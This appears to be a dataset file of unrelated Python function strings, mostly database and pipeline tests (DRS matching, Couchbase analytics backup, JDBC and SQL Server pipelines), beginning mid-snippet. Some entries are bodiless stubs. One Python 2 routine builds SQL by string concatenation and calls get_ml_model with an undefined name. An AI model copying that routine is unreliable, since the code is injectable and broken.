None}(v27),\n {'word': 'as', 'tag': 'IN', 'compound': 'as', 'entity': '', 'lemma': 'as', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'as'}(v30),\n {'word': 'possible', 'tag': 'j', 'compound': 'possible', 'entity': '', 'lemma': 'possible',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v31),\n {'word': 'time', 'tag': 'n', 'compound': 'time', 'entity': '', 'lemma': 'time', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v34),\n {'word': 'was', 'tag': 'v', 'compound': 'was', 'entity': '', 'lemma': 'be', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v40),\n {'word': 'science', 'tag': 'n', 'compound': 'science', 'entity': '', 'lemma': 'science',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v37),\n {'word': 'in', 'tag': 'IN', 'compound': 'in', 'entity': '', 'lemma': 'in', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'in'}(v38),\n {'word': 'question', 'tag': 'n', 'compound': 'question', 'entity': '', 'lemma': 'question',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v39),\n {'word': 'when', 'tag': 'WRB', 'compound': 'when', 'entity': '', 'lemma': 'when', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v35),\n {'word': 'at', 'tag': 'IN', 'compound': 'at', 'entity': '', 'lemma': 'at', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'at'}(v41),\n {'word': 'stage', 'tag': 'n', 'compound': 'stage', 'entity': '', 'lemma': 'stage', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v44),\n {'word': 'its', 'tag': 'PRP$', 'compound': 'its', 'entity': '', 'lemma': 'its', 
'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v42),\n {'word': 'simplest', 'tag': 'j', 'compound': 'simplest', 'entity': '', 'lemma': 'simple',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v43),\n {'word': 'include', 'tag': 'v', 'compound': 'include', 'entity': '', 'lemma': 'include',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v47),\n {'word': 'Examples', 'tag': 'n', 'compound': 'Examples', 'entity': '', 'lemma': 'example',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v46),\n {'word': 'Guide', 'tag': 'n', 'compound': 'Guide', 'entity': '', 'lemma': 'Guide', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v48),\n {'word': '.', 'tag': '.', 'compound': '.', 'entity': '', 'lemma': '.', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v68),\n {'word': 'to', 'tag': 'IN', 'compound': 'to', 'entity': '', 'lemma': 'to', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v49),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'and'}(v51),\n {'word': 'set', 'tag': 'v', 'compound': 'set', 'entity': '', 'lemma': 'set', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v56),\n {'word': 'Science', 'tag': 'n', 'compound': 'Science', 'entity': '', 'lemma': 'Science',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v50),\n {'word': 'volume', 'tag': 'n', 'compound': 'volume', 'entity': '', 'lemma': 'volume', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v55),\n {'word': 'three', 'tag': 'CD', 'compound': 'three', 'entity': 'CARDINAL', 'lemma': 'three',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v53),\n {'word': '-', 'tag': 'HYPH', 'compound': '-', 'entity': '', 'lemma': '-', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v54),\n {'word': 'Physics', 'tag': 'n', 'compound': 'Understanding_Physics', 'entity': 'ORG', 'lemma': 'Physics',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v58),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v59),\n {'word': 'and', 'tag': 'CC', 'compound': 'and', 'entity': '', 'lemma': 'and', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'and'}(v60),\n {'word': 'Chronology', 'tag': 'n', 'compound': 'Chronology', 'entity': 'WORK_OF_ART', 'lemma': 'Chronology',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v63),\n {'word': 'Asimov', 'tag': 'n', 'compound': 'Asimov', 'entity': 'PERSON', 'lemma': 'Asimov',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v61),\n {'word': 'of', 'tag': 'IN', 'compound': 'of', 'entity': 'WORK_OF_ART', 'lemma': 'of', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': 
None, 'negated': 'false', 'type': None}(v64),\n {'word': 'Science', 'tag': 'n', 'compound': 'Science', 'entity': 'WORK_OF_ART', 'lemma': 'Science',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v65),\n {'word': 'and', 'tag': 'CC', 'compound': 'and', 'entity': 'WORK_OF_ART', 'lemma': 'and',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'and'}(v66),\n {'word': 'Discovery', 'tag': 'n', 'compound': 'Discovery', 'entity': 'WORK_OF_ART', 'lemma': 'Discovery',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v67),\n {'word': 'wrote', 'tag': 'v', 'compound': 'wrote', 'entity': '', 'lemma': 'write', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v70),\n {'word': 'He', 'tag': 'PRP', 'compound': 'He', 'entity': 'PERSON', 'lemma': 'he', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v69),\n {'word': 'on', 'tag': 'IN', 'compound': 'on', 'entity': '', 'lemma': 'on', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v71),\n {'word': '.', 'tag': '.', 'compound': '.', 'entity': '', 'lemma': '.', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v97),\n {'word': 'topics', 'tag': 'n', 'compound': 'topics', 'entity': '', 'lemma': 'topic', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v79),\n {'word': 'scientific', 'tag': 'j', 'compound': 'scientific', 'entity': '', 'lemma': 'scientific',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v74),\n {'word': '-', 'tag': 'j', 'compound': '-', 'entity': '', 'lemma': '-', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v77),\n {'word': 'non', 'tag': 'j', 'compound': 'non', 'entity': '', 'lemma': 'non', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v76),\n {'word': 'scientific', 'tag': 'j', 'compound': 'scientific', 'entity': '', 'lemma': 'scientific',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v78),\n {'word': 'numerous', 'tag': 'j', 'compound': 'numerous', 'entity': '', 'lemma': 'numerous',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v72),\n {'word': 'other', 'tag': 'j', 'compound': 'other', 'entity': '', 'lemma': 'other', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v73),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v80),\n {'word': 'as', 'tag': 'IN', 'compound': 'as', 'entity': '', 'lemma': 'as', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'as'}(v82),\n {'word': 'such', 'tag': 'j', 'compound': 'such', 'entity': '', 'lemma': 'such', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v81),\n {'word': 'chemistry', 'tag': 'n', 'compound': 'chemistry', 'entity': '', 'lemma': 'chemistry',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v83),\n {'word': 
',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': 'and'}(v84),\n {'word': 'astronomy', 'tag': 'n', 'compound': 'astronomy', 'entity': '', 'lemma': 'astronomy',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v85),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v86),\n {'word': 'mathematics', 'tag': 'n', 'compound': 'mathematics', 'entity': '', 'lemma': 'mathematic',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v87),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v88),\n {'word': 'history', 'tag': 'n', 'compound': 'history', 'entity': '', 'lemma': 'history',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v89),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v90),\n {'word': 'exegesis', 'tag': 'n', 'compound': 'exegesis', 'entity': '', 'lemma': 'exegesis',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v92),\n {'word': 'biblical', 'tag': 'j', 'compound': 'biblical', 'entity': '', 'lemma': 'biblical',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v91),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v93),\n {'word': 'criticism', 'tag': 'n', 'compound': 'criticism', 'entity': '', 'lemma': 'criticism',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v96),\n {'word': 'literary', 'tag': 'j', 'compound': 'literary', 'entity': '', 'lemma': 'literary',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v95),\n {'type': 'AMOD'}(v24, v23), {'type': 'ADVMOD'}(v26, v29), {'type': 'ADVMOD'}(v28, v27),\n {'type': 'ADVMOD'}(v29, v28), {'type': 'NSUBJ'}(v40, v37), {'type': 'POSS'}(v44, v42),\n {'type': 'AMOD'}(v44, v43), {'type': 'NSUBJ'}(v47, v46), {'type': 'DOBJ'}(v47, v48),\n {'type': 'PUNCT'}(v47, v68), {'type': 'PREP'}(v48, v49), {'type': 'POBJ'}(v49, v50),\n {'type': 'PUNCT'}(v55, v54), {'type': 'NPADVMOD'}(v56, v55), {'type': 'DOBJ'}(v56, v58),\n {'type': 'PUNCT'}(v56, v59), {'type': 'POSS'}(v63, v61), {'type': 'PREP'}(v63, v64),\n {'type': 'POBJ'}(v64, v65), {'type': 'NSUBJ'}(v70, v69), {'type': 'PREP'}(v70, v71),\n {'type': 'PUNCT'}(v70, v97), {'type': 'POBJ'}(v71, v79), {'type': 'SUBTOK'}(v77, v76),\n {'type': 'SUBTOK'}(v78, v77), {'type': 'AMOD'}(v79, v72), {'type': 'AMOD'}(v79, v73),\n {'type': 'AMOD'}(v79, v74), {'type': 'AMOD'}(v79, v78), {'type': 'PUNCT'}(v79, v80),\n {'type': 'POBJ'}(v82, v83), {'type': 'PUNCT'}(v85, v86), {'type': 'CONJ'}(v85, v87),\n {'type': 'PUNCT'}(v87, v88), {'type': 'CONJ'}(v87, v89), {'type': 'PUNCT'}(v89, v90),\n {'type': 'CONJ'}(v89, v92), {'type': 'AMOD'}(v92, v91), {'type': 'PUNCT'}(v92, v93),\n {'type': 'CONJ'}(v92, v96), {'type': 'AMOD'}(v96, v95), {'type': 'AGENT'}(v2, v0),\n {'type': 
'ADVOCATIVE_CLAUSE'}(v19, v26), {'type': 'when'}(v34, v40), {'type': 'of'}(v13, v18),\n {'type': 'AGENT'}(v19, v13), {'type': 'PATIENT'}(v19, v20), {'type': 'in'}(v19, v24),\n {'type': 'NUMBER'}(v55, v53), {'type': 'OWNS'}(v61, v63), {'type': 'OWNS'}(v15, v18),\n {'type': 'PATIENT'}(v2, v5), {'type': 'and'}(v56, v63), {'type': 'and'}(v48, v56),\n {'type': 'and'}(v65, v67), {'type': 'and'}(v83, v85), {'type': 'in'}(v37, v39), {'type': 'to'}(v26, v34),\n {'type': 'as'}(v29, v31), {'type': 'at'}(v40, v44), {'type': 'as'}(v79, v81), {'type': 'of'}(v18, v17),\n {'type': 'ADJECTIVE'}(v11, v10), {'type': 'ADVERB'}(v2, v1), {'type': 'ADJECTIVE'}(v18, v16),\n {'type': 'as'}(v2, v3), {'type': 'as'}(v2, v5)\"\"\")\n lst = drs.apply(DrsMatcher(expected_drs, metric))\n is_match = len(lst) > 1\n self.assertTrue(is_match)", "def testConsistency(self):", "def test_snippet_2(self):\n\n text = \"Jon is a carpenter and an engineer\"\n drs = Drs.create_from_natural_language(text)\n expected_drs = Drs.create_from_predicates_string(\"\"\"\n {'word': 'is', 'tag': 'v', 'compound': 'is', 'entity': '', 'lemma': 'be', 'gender_guess': None, 'is_head_token': True, 'refers_to': None, 'negated': 'false'}(v1), {'word': 'Jon', 'tag': 'n', 'compound': 'Jon', 'entity': 'PERSON', 'lemma': 'Jon', 'gender_guess': 'm', 'is_head_token': False, 'refers_to': None, 'negated': 'false'}(v0), {'word': 'carpenter', 'tag': 'n', 'compound': 'carpenter', 'entity': '', 'lemma': 'carpenter', 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false'}(v3), {'word': 'engineer', 'tag': 'n', 'compound': 'engineer', 'entity': '', 'lemma': 'engineer', 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false'}(v6), {'type': 'AGENT'}(v1,v0), {'type': 'ATTR'}(v1,v6), {'type': 'ATTR'}(v1,v3), {'type': 'ATTR'}(v1,v6)\n \"\"\")\n lst = drs.apply(DrsMatcher(expected_drs, metric))\n is_match = len(lst) > 1\n self.assertTrue(is_match)", "def test_schema(self):\r\n db_connection = modulestore().db_connection\r\n for collection in [db_connection.course_index, db_connection.structures, db_connection.definitions]:\r\n self.assertEqual(\r\n collection.find({'schema_version': {'$exists': False}}).count(),\r\n 0,\r\n \"{0.name} has records without schema_version\".format(collection)\r\n )\r\n self.assertEqual(\r\n collection.find({'schema_version': {'$ne': SplitMongoModuleStore.SCHEMA_VERSION}}).count(),\r\n 0,\r\n \"{0.name} has records with wrong schema_version\".format(collection)\r\n )", "def test_document_retrieval(self):", "def test_all_documents(self):", "def test_creating_index_type(self):", "def test_analytics_synonyms(self):\n class Query:\n \"\"\" A class to execute analytics queries \"\"\"\n\n def __init__(self, server, username, password):\n self.restconn = RestConnection(server)\n\n def execute(self, query):\n return self.restconn.execute_statement_on_cbas(query, None)\n\n def get_synonyms(self):\n synonyms = set()\n\n for result in json.loads(self.execute(\"select * from Metadata.`Synonym`\"))['results']:\n synonym = result['Synonym']\n synonym_name = synonym['SynonymName']\n synonym_target = synonym['ObjectDataverseName'] + '.' 
+ synonym['ObjectName']\n synonym_dataverse = synonym['DataverseName']\n synonyms.add((synonym_name, synonym_target, synonym_dataverse))\n\n return synonyms\n\n def get_synonyms_count(self):\n return json.loads(self.execute(\"select count(*) as count from Metadata.`Synonym`;\"))['results'][0]['count']\n\n class Dataset:\n\n def __init__(self, name, bucket, clause=None):\n self.name, self.bucket, self.clause = name, bucket, clause\n\n def get_where_clause(self):\n return f\" WHERE {self.clause}\" if self.clause else \"\"\n\n class Synonym:\n\n def __init__(self, name, target):\n self.name, self.target = name, target\n\n class Dataverse:\n\n def __init__(self, name):\n self.name = name\n self.datasets = set()\n self.synonyms = set()\n\n def add_dataset(self, dataset):\n self.datasets.add(dataset)\n\n def add_synonym(self, synonym):\n self.synonyms.add(synonym)\n\n def next_dataset_name(self):\n return f\"dat_{len(self.datasets)}\"\n\n def next_synonym_name(self):\n return f\"syn_{len(self.synonyms)}\"\n\n class Analytics:\n\n def __init__(self, query):\n self.query, self.dataverses = query, set()\n\n def add_dataverse(self, dataverse):\n self.dataverses.add(dataverse)\n\n def next_dataverse_name(self):\n return f\"dtv_{len(self.dataverses)}\"\n\n def pick_target_for_synonym(self):\n choices = [f\"{dataverse.name}.{dataset.name}\" for dataverse in self.dataverses for dataset in dataverse.datasets]\n\n if choices:\n return choice(choices)\n\n return None\n\n def create(self):\n # Create daterverses and datasets\n for dataverse in self.dataverses:\n self.query.execute(f\"CREATE dataverse {dataverse.name}\")\n\n for dataset in dataverse.datasets:\n self.query.execute(f\"CREATE DATASET {dataverse.name}.{dataset.name} ON {dataset.bucket}{dataset.get_where_clause()}\")\n\n # Create synonyms\n for dataverse in self.dataverses:\n for synonym in dataverse.synonyms:\n self.query.execute(f\"CREATE analytics synonym {dataverse.name}.{synonym.name} FOR {synonym.target}\")\n\n def delete(self):\n for dataverse in self.dataverses:\n for dataset in dataverse.datasets:\n self.query.execute(f\"DROP DATASET {dataverse.name}.{dataset.name}\")\n\n for synonym in dataverse.synonyms:\n self.query.execute(f\"DROP analytics synonym {dataverse.name}.{synonym.name}\")\n\n self.query.execute(f\"DROP dataverse {dataverse.name}\")\n\n class AnalyticsTest:\n\n def __init__(self, backup, no_of_dataverses, no_of_datasets, no_of_synonyms, analytics_server):\n # The base class\n self.backup = backup\n\n # Test parameters\n self.no_of_dataverses, self.no_of_datasets, self.no_of_synonyms = no_of_dataverses, no_of_datasets, no_of_synonyms\n\n # The number of synonyms that get created\n self.no_of_synonyms_created = no_of_dataverses * no_of_synonyms\n\n # The object thats used to run queries on the server running analytics\n self.query = Query(analytics_server, analytics_server.rest_username, analytics_server.rest_password)\n\n # The object that represents our current model of analytics\n self.analytics = Analytics(self.query)\n\n def test_analytics(self):\n # Define the analytics model (i.e. 
which dataverses, datasets and synonyms are present)\n for i in range(self.no_of_dataverses):\n dataverse = Dataverse(self.analytics.next_dataverse_name())\n self.analytics.add_dataverse(dataverse)\n\n for j in range(self.no_of_datasets):\n dataset = Dataset(dataverse.next_dataset_name(), 'default')\n dataverse.add_dataset(dataset)\n\n for j in range(self.no_of_synonyms):\n synonym = Synonym(dataverse.next_synonym_name(), self.analytics.pick_target_for_synonym())\n dataverse.add_synonym(synonym)\n\n # Create dataverses, datasets and synonyms\n self.analytics.create()\n self.backup.assertEqual(self.query.get_synonyms_count(), self.no_of_synonyms_created)\n\n # Create a repository\n self.backup.backup_create()\n\n # Take a backup\n self.backup.backup_cluster()\n\n # Delete all analytics related stuff\n self.analytics.delete()\n self.backup.assertEqual(self.query.get_synonyms_count(), 0)\n\n # Perform a one off restore\n self.backup.backup_restore()\n synonyms = self.query.get_synonyms()\n\n # Check synonyms have been restored\n for dataverse in self.analytics.dataverses:\n for synonym in dataverse.synonyms:\n self.backup.assertIn((synonym.name, synonym.target, dataverse.name), synonyms)\n\n # The server that will be reprovisioned with analytics\n analytics_server = self.restore_cluster_host = self.servers[2]\n\n # Add a server and provision it with analytics\n self.add_server_with_custom_services(analytics_server, services=[\"cbas\"])\n\n # A little sleep for services to warmup\n self.assertTrue(RestConnection(analytics_server).wait_until_cbas_is_ready(100))\n\n # Run the analytics test\n AnalyticsTest(self, self.input.param(\"dataverses\", 5), self.input.param(\"datasets\", 5), self.input.param(\"synonyms\", 5), analytics_server).test_analytics()", "def test_match(add_doc, add_institution):\n\n doc = add_doc(log={\n 'url': 'http://yale.edu/syllabus.pdf'\n })\n\n yale = add_institution(\n name='Yale University',\n domain='yale.edu',\n )\n\n harvard = add_institution(\n name='Harvard University',\n domain='harvard.edu',\n )\n\n doc_to_inst(doc.id)\n\n # Should write a link.\n assert Institution_Document.select().count() == 1\n\n # Should link the right rows.\n assert Institution_Document.select().where(\n Institution_Document.institution==yale,\n Institution_Document.document==doc,\n )", "def test_primary_keys_metadata(sdc_builder, sdc_executor, database, values):\n if not database.is_ct_enabled:\n pytest.skip('Test only runs against SQL Server with CT enabled.')\n\n pipeline = None\n table_name = get_random_string(string.ascii_lowercase, 20)\n\n try:\n connection = database.engine.connect()\n\n if values == 'numeric':\n connection.execute(get_create_table_query_numeric(table_name, database))\n else:\n connection.execute(get_create_table_query_non_numeric(table_name, database))\n\n # Create the pipeline\n pipeline_builder = sdc_builder.get_pipeline_builder()\n sql_server_change_tracking = pipeline_builder.add_stage('SQL Server Change Tracking Client')\n sql_server_change_tracking.set_attributes(\n table_configs=[{\n 'initialOffset': 0,\n 'schema': 'dbo',\n 'tablePattern': f'{table_name}'\n }]\n )\n wiretap = pipeline_builder.add_wiretap()\n sql_server_change_tracking >> wiretap.destination\n\n pipeline = pipeline_builder.build(\"SQL Server CT Pipeline\").configure_for_environment(database)\n sdc_executor.add_pipeline(pipeline)\n connection = database.engine.connect()\n # enable change tracking on table\n connection.execute(f'ALTER TABLE {table_name} ENABLE change_tracking WITH 
(track_columns_updated = on)')\n sdc_executor.start_pipeline(pipeline)\n\n if values == 'numeric':\n connection.execute(get_insert_query_numeric(table_name, database))\n primary_key_specification_expected = PRIMARY_KEY_NUMERIC_METADATA_SQLSERVER\n else:\n connection.execute(get_insert_query_non_numeric(table_name, database))\n primary_key_specification_expected = PRIMARY_KEY_NON_NUMERIC_METADATA_SQLSERVER\n\n sdc_executor.wait_for_pipeline_metric(pipeline, 'input_record_count', 1)\n\n assert len(wiretap.output_records) == 1\n\n record = wiretap.output_records[0]\n assert \"jdbc.primaryKeySpecification\" in record.header.values\n assert record.header.values[\"jdbc.primaryKeySpecification\"] is not None\n\n primary_key_specification_json = json.dumps(\n json.loads(record.header.values[\"jdbc.primaryKeySpecification\"]),\n sort_keys=True\n )\n\n primary_key_specification_expected_json = json.dumps(\n json.loads(primary_key_specification_expected),\n sort_keys=True\n )\n\n assert primary_key_specification_json == primary_key_specification_expected_json\n\n finally:\n logger.info('Dropping table %s in %s database...', table_name, database.type)\n connection.execute(f'drop table if exists {table_name}')\n\n if pipeline and (sdc_executor.get_pipeline_status(pipeline).response.json().get('status') == 'RUNNING'):\n sdc_executor.stop_pipeline(pipeline)", "def test_search_collection_object_type():\n col = Collection(search='forest', object_type=['layer', 'dataset', 'widget'], app=['gfw'])\n assert len(col) > 1", "def test_import_data():\n\n file_path = os.path.join(CONST_ADVANTICSYS_DIR, CONST_ADVANTICSYS_TEST_1)\n\n # Bring df\n success, log, test_ingress_df = advanticsys_import(file_path)\n assert success, log\n assert isinstance(test_ingress_df, pd.DataFrame)\n\n # Test import function\n success, log = import_data(\n test_ingress_df,\n CONST_ADVANTICSYS,\n SQL_USER,\n SQL_PASSWORD,\n SQL_HOST,\n SQL_PORT,\n SQL_TEST_DBNAME\n )\n\n assert success is True, log \n assert log == \"New: 0 (uploaded); Duplicates: 75 (ignored)\"", "def test_ds(self, obj):\n pass", "def setup_compare_functional_loci(con):\n\n cur = con.cursor()\n\n sql = \"delete from Compare_DNDS_Fscores\"\n cur.execute(sql)\n con.commit()\n\n sql = \"select id from DNDS_Models where name='Nsites_branch'\"\n cur.execute(sql)\n x = cur.fetchall()\n if x.__len__() == 0:\n write_log(\n con, \"There are no DNDS_Models in the database, so I'm skipping the comparison of DNDS to Df.\")\n return\n nsites_id = x[0][0]\n\n sql = \"select id from AlignmentMethods where name='muscle'\"\n cur.execute(sql)\n muscleid = cur.fetchone()\n if muscleid is None:\n print \"\\n. 
Warning - the comparison of functional loci is hardcoded to use the MUSCLE alignment\"\n print \"but it appears that the muscle method wasn't used with your data.\"\n print \"I'm skipping the comparison\"\n return\n muscleid = muscleid[0]\n ml_modelid = get_ml_model(con, muscle)\n\n sql = \"select id, almethod, anc1, anc2 from DNDS_Tests where dnds_model=\" + \\\n nsites_id.__str__() + \" and phylomodel=\" + ml_modelid.__str__()\n cur.execute(sql)\n x = cur.fetchall()\n for ii in x:\n dnds_testid = ii[0]\n almethod = ii[1]\n phylomodel = ml_modelid\n anc1 = ii[2]\n anc2 = ii[3]\n\n if anc1 == anc2:\n write_log(con, \"I'm skipping the dnds comparison \" +\n dnds_testid.__str__() + \" because anc 1 and 2 match.\")\n continue\n\n \"\"\"Find the matching Fscore test\"\"\"\n sql = \"select id from FScore_Tests where almethod=\" + almethod.__str__() + \" and phylomodel=\" + \\\n phylomodel.__str__() + \" and ancid1=\" + anc1.__str__() + \\\n \" and ancid2=\" + anc2.__str__()\n cur.execute(sql)\n y = cur.fetchall()\n if y.__len__() > 0:\n fscore_testid = y[0][0]\n\n sql = \"insert into Compare_DNDS_Fscores (dnds_testid, fscore_testid) values(\" + \\\n dnds_testid.__str__()\n sql += \",\" + fscore_testid.__str__() + \")\"\n cur.execute(sql)\n con.commit()", "def test_search_collection():\n col = Collection(search='forest', app=['gfw'])\n assert len(col) > 1", "def test_jdbc_tables_header(sdc_builder, sdc_executor, database):\n\n table_name1 = get_random_string(string.ascii_lowercase, 20)\n table_name2 = get_random_string(string.ascii_lowercase, 20)\n if database.type == 'Oracle':\n # When not quoted, Oracle automatically converts names to upper case. Quoting is inconsistent between\n # databases, so it is preferable to avoid it in SQL below. And to get a compatible result during creation,\n # we omit quotes here also.\n create_quotes_names = False\n else:\n create_quotes_names = True\n\n logger.info('Creating two identical tables in %s database...', database.type)\n table1 = _create_table(table_name1, database, quote=create_quotes_names)\n table2 = _create_table(table_name2, database, quote=create_quotes_names)\n\n connection = database.engine.connect()\n try:\n logger.info('Adding %s rows into each table...', len(ROWS_IN_DATABASE))\n connection.execute(table1.insert(), ROWS_IN_DATABASE)\n connection.execute(table2.insert(), ROWS_IN_DATABASE)\n\n builder = sdc_builder.get_pipeline_builder()\n\n sql_query = \"SELECT t1.id, t2.name \" \\\n f\"FROM {table_name1} t1 \" \\\n f\" JOIN {table_name2} t2 \" \\\n \" ON t1.name = t2.name \" \\\n \"WHERE t1.id > ${OFFSET} \" \\\n \"ORDER BY t1.id\"\n origin = builder.add_stage('JDBC Query Consumer')\n origin.sql_query = sql_query\n origin.offset_column = 'id'\n origin.incremental_mode = True\n origin.on_unknown_type = 'STOP_PIPELINE'\n\n wiretap = builder.add_wiretap()\n\n origin >> wiretap.destination\n\n pipeline = builder.build().configure_for_environment(database)\n sdc_executor.add_pipeline(pipeline)\n\n sdc_executor.start_pipeline(pipeline)\n sdc_executor.wait_for_pipeline_metric(pipeline, 'input_record_count', 3)\n sdc_executor.stop_pipeline(pipeline)\n\n # Check jdbc.tables header.\n tables_header = wiretap.output_records[0].header['values']['jdbc.tables']\n logger.debug('%s=\"%s\"', \"header['values']['jdbc.tables']\", tables_header)\n logger.debug('%s=\"%s\"', \"database.type\", database.type)\n # According to documentation some JDBC drivers may not provide this information:\n # 
https://docs.streamsets.com/platform-datacollector/latest/datacollector/UserGuide/Origins/JDBCConsumer.html\n if database.type == 'Oracle':\n # Oracle does not seem to populate this field\n assert tables_header == \"\"\n elif database.type == 'SQLServer':\n # SQLServer does not seem to populate this field\n assert tables_header == \"\"\n else:\n # MySQL, PostgreSQL and MiriaDB all return source table names as a coma-delimited list.\n # Ordering of the list is not known for PostgreSQL and MiriaDB, but For MySQL it is predictably random.\n # The logic below asserts that both names are reported in any order (and case is ignored, though this\n # should not be necessary):\n tables_list = tables_header.split(',')\n tables_normalized_map = map(lambda x:x.lower(), tables_list)\n assert set(tables_normalized_map) == {table_name1, table_name2}\n\n finally:\n try:\n logger.info('Dropping table %s in %s database ...', table_name1, database.type)\n connection.execute(f\"DROP TABLE {table_name1}\")\n logger.info('Dropping table %s in %s database ...', table_name2, database.type)\n connection.execute(f\"DROP TABLE {table_name2}\")\n except Exception as ex:\n logger.warning('Error during cleanup', exc_info=ex)", "def test_tables_have_data(dataset, project_id, concepts):\n\n for folder, concept_list in concepts.items():\n for concept_name in concept_list:\n query = f\"\"\"\n SELECT *\n FROM {dataset}.{concept_name}\n LIMIT 5\n \"\"\"\n df = gbq.read_gbq(query, project_id=project_id, dialect=\"standard\")\n assert df.shape[0] > 0, f'did not find table for {folder}.{concept_name}'", "def test_a_general(self):\n\n # Create the default application settings -- note that we have only one morpheme delimiter.\n # This is relevant to the morphemic language model.\n application_settings = h.generate_default_application_settings()\n application_settings.morpheme_delimiters = u'-'\n Session.add(application_settings)\n Session.commit()\n\n # Create some syntactic categories\n cats = {\n 'N': model.SyntacticCategory(name=u'N'),\n 